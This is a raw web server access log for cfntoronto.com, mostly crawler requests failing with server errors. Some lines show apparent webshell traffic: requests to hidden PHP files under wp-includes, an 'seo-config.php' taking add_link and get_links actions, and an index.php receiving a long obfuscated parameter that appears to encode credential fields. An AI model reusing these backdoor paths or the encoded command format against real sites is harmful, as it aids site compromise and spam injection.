74.7.241.19 - - [31/Aug/2026:08:27:27 -0400] "GET /?v=s2a4b0b2a4t8i9c2204 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:28:39 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
107.150.52.226 - - [31/Aug/2026:08:27:27 -0400] "GET /wp-includes/br06391a/edit.php?id=823179$sp HTTP/1.1" 200 - "https://cfntoronto.com/wp-includes/br06391a/edit.php?id=823179$sp" "Mozilla/5.0"
104.219.215.160 - - [31/Aug/2026:08:21:23 -0400] "GET / HTTP/1.1" 200 30485 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.109.118.212 - - [31/Aug/2026:08:30:45 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:27:34 -0400] "GET /?o=194030911 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:27:36 -0400] "GET /?o=206005057 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
198.204.240.234 - - [31/Aug/2026:08:27:44 -0400] "GET /wp-includes/br06391a/edit.php HTTP/1.1" 200 - "https://cfntoronto.com/wp-includes/br06391a/edit.php" "Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; ja) Opera 10.10"
74.7.241.19 - - [31/Aug/2026:08:27:47 -0400] "GET /?v=m2u8c6k5w3o2r8m577 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.19 - - [31/Aug/2026:08:28:17 -0400] "GET /?v=m2o8r9a5l2i3s5m697 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
198.204.240.234 - - [31/Aug/2026:08:28:24 -0400] "GET /wp-includes/br06391a/edit.php HTTP/1.1" 200 26 "https://cfntoronto.com/wp-includes/br06391a/edit.php" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
65.109.118.212 - - [31/Aug/2026:08:28:39 -0400] "GET /?o=206005929 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:28:45 -0400] "GET /?o=194034857 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:28:47 -0400] "GET /?v=a2l6e6c3t4u5r8a540 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:32:49 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:29:17 -0400] "GET /?v=t2i3l2b6u8r8g7h197 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:29:42 -0400] "GET /?o=206006311 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:29:47 -0400] "GET /?v=f2i1t0f5u8l4l5y057 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:29:51 -0400] "GET /?o=194036479 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:30:17 -0400] "GET /?v=u2n4j0u6s3t2l0y884 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
179.43.146.218 - - [31/Aug/2026:08:30:34 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
179.43.146.218 - - [31/Aug/2026:08:30:38 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
65.109.118.212 - - [31/Aug/2026:08:30:45 -0400] "GET /?o=206007587 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:30:47 -0400] "GET /?v=m2a9g7n0e6s8i7c761 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.247.76.75 - - [31/Aug/2026:08:25:56 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138323735362p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137393135362q3461623331653565306465316464653832646563623838643535656663623838222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
65.109.118.212 - - [31/Aug/2026:08:31:01 -0400] "GET /?o=194037719 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:31:17 -0400] "GET /?v=a2c8t5i5n9i8u7m462 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.247.76.75 - - [31/Aug/2026:08:26:21 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138323738312p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137393138312q3032343461626439633866643563323161663431343861383332346533376462222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
104.247.76.75 - - [31/Aug/2026:08:26:42 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138323830322p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137393230322q3839643238373433383636306537616239616465333966613066386138323733222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
65.109.118.212 - - [31/Aug/2026:08:31:47 -0400] "GET /?o=206016179 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:31:47 -0400] "GET /?v=p2a5s5i6l1a0l0y472 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:32:07 -0400] "GET /?o=194043129 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
104.219.215.160 - - [31/Aug/2026:08:32:01 -0400] "GET / HTTP/1.1" 200 19629 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.241.19 - - [31/Aug/2026:08:32:17 -0400] "GET /?biplicity/2699102843 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
179.43.146.218 - - [31/Aug/2026:08:32:32 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
104.247.76.75 - - [31/Aug/2026:08:27:28 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138323834382p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137393234382q3066363437626263323463653961613935373234306161316266316430363166222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
74.7.241.19 - - [31/Aug/2026:08:32:47 -0400] "GET /?v=c2r5i1s2p4a6t6a837 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
179.43.146.218 - - [31/Aug/2026:08:32:36 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
65.109.118.212 - - [31/Aug/2026:08:32:50 -0400] "GET /?o=206016453 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
198.204.240.234 - - [31/Aug/2026:08:28:04 -0400] "GET /wp-includes/br06391a/edit.php HTTP/1.1" 500 - "https://cfntoronto.com/wp-includes/br06391a/edit.php" "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; ja) Presto/2.10.289 Version/12.00"
74.7.241.19 - - [31/Aug/2026:08:33:17 -0400] "GET /?v=w2h3e6a0t3e3a4r529 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:33:18 -0400] "GET /?o=194049633 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
40.77.167.10 - - [31/Aug/2026:08:33:21 -0400] "GET /?v=m4i3s0o4p0i2n3i3o9n70 HTTP/1.1" 200 31508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.19 - - [31/Aug/2026:08:33:47 -0400] "GET /?v=b2r1a0s8i4l3i2n762 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
107.150.52.226 - - [31/Aug/2026:08:33:50 -0400] "GET /wp-includes/br06391a/edit.php?id=823179$sp HTTP/1.1" 200 26 "https://cfntoronto.com/wp-includes/br06391a/edit.php?id=823179$sp" "Mozilla/5.0"
65.109.118.212 - - [31/Aug/2026:08:33:52 -0400] "GET /?o=206023795 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:33:57 -0400] "GET /?o=206024611 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:33:59 -0400] "GET /?o=206029477 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:34:01 -0400] "GET /?o=195001834 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:34:02 -0400] "GET /?o=206042639 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:34:04 -0400] "GET /?o=206043483 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:34:06 -0400] "GET /?o=206045865 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:34:07 -0400] "GET /?v=w2h9e4e5l9m7a4n379 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:34:08 -0400] "GET /?o=207001356 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:34:11 -0400] "GET /?o=207002486 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:34:13 -0400] "GET /?o=207007162 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:35:17 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
107.150.52.226 - - [31/Aug/2026:08:32:23 -0400] "GET /wp-includes/br06391a/edit.php?id=823179$sp HTTP/1.1" 200 - "https://cfntoronto.com/wp-includes/br06391a/edit.php?id=823179$sp" "Mozilla/5.0"
65.109.118.212 - - [31/Aug/2026:08:34:15 -0400] "GET /?o=207012110 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
104.247.76.75 - - [31/Aug/2026:08:29:16 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138323935362p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137393335362q3363663535623131346463626434636662653866613336656134646532393138222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
179.43.146.218 - - [31/Aug/2026:08:34:27 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
65.109.118.212 - - [31/Aug/2026:08:34:18 -0400] "GET /?o=195006340 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:34:27 -0400] "GET /?v=h2o8s5t7e1l9e9r561 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
179.43.146.218 - - [31/Aug/2026:08:34:31 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
74.7.241.19 - - [31/Aug/2026:08:34:57 -0400] "GET /?v=d2a1r3k6e9n0e0d572 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:35:18 -0400] "GET /?o=207015492 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
107.150.52.226 - - [31/Aug/2026:08:35:20 -0400] "GET /wp-includes/br06391a/edit.php?id=823179$sp HTTP/1.1" 200 - "https://cfntoronto.com/wp-includes/br06391a/edit.php?id=823179$sp" "Mozilla/5.0"
74.7.241.19 - - [31/Aug/2026:08:35:21 -0400] "GET /?v=s2l7i0p2b4o7a9r5d32 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:35:23 -0400] "GET /?o=207020958 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:35:35 -0400] "GET /?o=195006512 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:37:27 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
157.245.72.180 - - [31/Aug/2026:08:39:27 -0400] "GET / HTTP/1.1" 200 12442 "-" "Mozilla/5.0 (compatible; ForestEngine/1.0; +https://forestengine.net/)"
65.109.118.212 - - [31/Aug/2026:08:39:32 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:41:37 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
104.247.76.75 - - [31/Aug/2026:08:32:49 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138333136392p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137393536392q6533333862383735643463653865383166653830343263666439666430333536222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 504 - "-" "-"
65.109.118.212 - - [31/Aug/2026:08:43:42 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
104.247.76.75 - - [31/Aug/2026:08:34:15 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138333235352p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137393635352q3830663562363931646232623966383732613731376537353739303134396334222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 504 - "-" "-"
74.7.241.19 - - [31/Aug/2026:08:39:21 -0400] "GET /?v=t2r1i5g5l8y1p3h067 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:39:32 -0400] "GET /?o=207042886 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
104.247.76.75 - - [31/Aug/2026:08:34:35 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138333237352p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137393637352q6132383464646465383162323066663836626333616535643461323939373730222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
65.109.118.212 - - [31/Aug/2026:08:40:09 -0400] "GET /?o=195015504 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:39:51 -0400] "GET /?v=b2a1t6r7a5c7h8u3s64 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.19 - - [31/Aug/2026:08:40:21 -0400] "GET /?v=e2x9p8l5o7s8i2o1n40 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:40:34 -0400] "GET /?o=207045506 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
104.247.76.75 - - [31/Aug/2026:08:35:42 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138333334322p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137393734322q3361353439626562356531653435326638633731316236616536616462306461222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
74.7.241.19 - - [31/Aug/2026:08:35:51 -0400] "GET /?v=b2e2r5a6t1i4n9g0689 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.19 - - [31/Aug/2026:08:40:51 -0400] "GET /ventriloquized/f2i6r7e8o9n7t8h2e3m3ountain HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.19 - - [31/Aug/2026:08:36:21 -0400] "GET /?v=d2o2w4n5b0e1a6t7079 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
51.89.72.4 - - [31/Aug/2026:08:41:30 -0400] "GET /denigrator/c3a1n9o0e4s643722 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
65.109.118.212 - - [31/Aug/2026:08:36:25 -0400] "GET /?o=207023938 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
179.43.146.218 - - [31/Aug/2026:08:41:41 -0400] "GET /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=get_links HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
65.109.118.212 - - [31/Aug/2026:08:41:37 -0400] "GET /?o=207049290 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
179.43.146.218 - - [31/Aug/2026:08:41:46 -0400] "GET /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=get_links HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
65.109.118.212 - - [31/Aug/2026:08:36:46 -0400] "GET /?o=195008612 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:41:52 -0400] "GET /?v=p2e5l8i6c7a8n9s52 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.19 - - [31/Aug/2026:08:36:51 -0400] "GET /?v=f2l1o0a5t6i9n6g8712 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.247.76.75 - - [31/Aug/2026:08:37:10 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138333433302p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137393833302q6364623935356139306337663064303830386161626631626463663632613036222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
179.43.146.218 - - [31/Aug/2026:08:42:16 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
179.43.146.218 - - [31/Aug/2026:08:42:20 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
74.7.241.19 - - [31/Aug/2026:08:37:21 -0400] "GET /?v=p2a1p2a6b9o9t2e5451 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
179.43.146.218 - - [31/Aug/2026:08:42:25 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
